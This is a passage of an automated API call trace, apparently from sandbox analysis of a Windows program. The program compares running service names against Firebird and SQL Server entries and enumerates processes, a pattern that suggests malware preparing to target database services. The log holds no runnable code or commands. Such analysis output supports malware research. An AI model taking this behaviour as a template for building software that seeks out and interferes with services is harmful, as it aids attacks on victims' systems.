(lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0044.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0044.997] lstrlenW (lpString="nsi") returned 3 [0044.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0044.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0044.997] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0044.997] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0044.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0044.997] lstrlenW (lpString="PcaSvc") returned 6 [0044.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0044.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0044.997] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0044.997] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0044.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0044.997] lstrlenW (lpString="PlugPlay") returned 8 [0044.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0044.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0044.998] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0044.998] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0044.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0044.998] lstrlenW (lpString="Power") returned 5 [0044.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0044.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0044.998] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0044.998] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0044.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0044.998] lstrlenW (lpString="ProfSvc") returned 7 [0044.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0044.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0044.998] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0044.998] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0044.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0044.998] lstrlenW (lpString="RpcEptMapper") returned 12 [0044.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0044.998] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0044.998] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0044.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0044.998] lstrlenW (lpString="RpcSs") returned 5 [0044.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0045.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0045.128] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0045.128] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0045.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0045.128] lstrlenW (lpString="SamSs") returned 5 [0045.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0045.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0045.128] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0045.128] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0045.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0045.128] lstrlenW (lpString="Schedule") returned 8 [0045.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0045.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0045.128] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0045.128] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0045.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0045.128] lstrlenW (lpString="SecurityHealthService") returned 21 [0045.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0045.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0045.128] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0045.128] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0045.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0045.128] lstrlenW (lpString="SENS") returned 4 [0045.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0045.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0045.128] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0045.128] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0045.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0045.129] lstrlenW (lpString="ShellHWDetection") returned 16 [0045.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0045.129] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0045.129] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0045.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0045.129] lstrlenW (lpString="Spooler") returned 7 [0045.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0045.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0045.129] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0045.129] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0045.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0045.129] lstrlenW (lpString="StateRepository") returned 15 [0045.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0045.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0045.129] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0045.129] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0045.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0045.129] lstrlenW (lpString="SysMain") returned 7 [0045.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0045.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0045.129] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0045.129] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0045.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0045.129] lstrlenW (lpString="SystemEventsBroker") returned 18 [0045.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0045.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0045.129] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0045.129] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0045.129] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x632918 | out: hHeap=0x5d0000) returned 1 [0045.129] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2a8 [0045.135] Process32FirstW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0045.135] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0045.136] lstrlenW (lpString="System") returned 6 [0045.136] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0045.137] lstrlenW (lpString="smss.exe") returned 8 [0045.137] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.138] lstrlenW (lpString="csrss.exe") returned 9 [0045.138] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0045.138] lstrlenW (lpString="wininit.exe") returned 11 [0045.138] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.139] lstrlenW (lpString="csrss.exe") returned 9 [0045.139] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0045.140] lstrlenW (lpString="winlogon.exe") returned 12 [0045.140] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0045.140] lstrlenW (lpString="services.exe") returned 12 [0045.140] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0045.141] lstrlenW (lpString="lsass.exe") returned 9 [0045.141] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.142] lstrlenW (lpString="svchost.exe") returned 11 [0045.142] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0045.142] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0045.143] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0045.143] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0045.143] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.144] lstrlenW (lpString="svchost.exe") returned 11 [0045.144] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0045.144] lstrlenW (lpString="dwm.exe") returned 7 [0045.144] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.145] lstrlenW (lpString="svchost.exe") returned 11 [0045.145] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.146] lstrlenW (lpString="svchost.exe") returned 11 [0045.146] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.146] lstrlenW (lpString="svchost.exe") returned 11 [0045.146] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.147] lstrlenW (lpString="svchost.exe") returned 11 [0045.147] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.148] lstrlenW (lpString="svchost.exe") returned 11 [0045.148] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.148] lstrlenW (lpString="svchost.exe") returned 11 [0045.148] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.149] lstrlenW (lpString="svchost.exe") returned 11 [0045.149] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.150] lstrlenW (lpString="svchost.exe") returned 11 [0045.150] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.150] lstrlenW (lpString="svchost.exe") returned 11 [0045.150] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0045.151] lstrlenW (lpString="spoolsv.exe") returned 11 [0045.151] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.152] lstrlenW (lpString="svchost.exe") returned 11 [0045.152] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.152] lstrlenW (lpString="svchost.exe") returned 11 [0045.152] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0045.153] lstrlenW (lpString="audiodg.exe") returned 11 [0045.153] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0045.154] lstrlenW (lpString="sihost.exe") returned 10 [0045.154] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.154] lstrlenW (lpString="svchost.exe") returned 11 [0045.154] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0045.155] lstrlenW (lpString="taskhostw.exe") returned 13 [0045.155] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0045.156] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0045.156] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0045.157] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0045.157] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0045.157] lstrlenW (lpString="explorer.exe") returned 12 [0045.157] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0045.158] lstrlenW (lpString="Memory Compression") returned 18 [0045.158] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0045.159] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0045.159] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0045.159] lstrlenW (lpString="SearchUI.exe") returned 12 [0045.159] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0045.160] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0045.160] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0045.256] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0045.256] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0045.257] lstrlenW (lpString="taskhostw.exe") returned 13 [0045.257] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0045.257] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0045.257] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0045.258] lstrlenW (lpString="UsoClient.exe") returned 13 [0045.258] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0045.259] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0045.259] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0045.259] lstrlenW (lpString="taskhostw.exe") returned 13 [0045.259] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0045.260] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0045.260] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0045.261] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0045.261] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0045.261] lstrlenW (lpString="msoia.exe") returned 9 [0045.261] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0045.262] lstrlenW (lpString="msoia.exe") returned 9 [0045.262] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0045.263] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0045.263] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0045.263] lstrlenW (lpString="screensaver.exe") returned 15 [0045.263] Process32NextW (in: hSnapshot=0x2a8, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0045.264] lstrlenW (lpString="xml upper.exe") returned 13 [0045.264] Process32NextW (in: 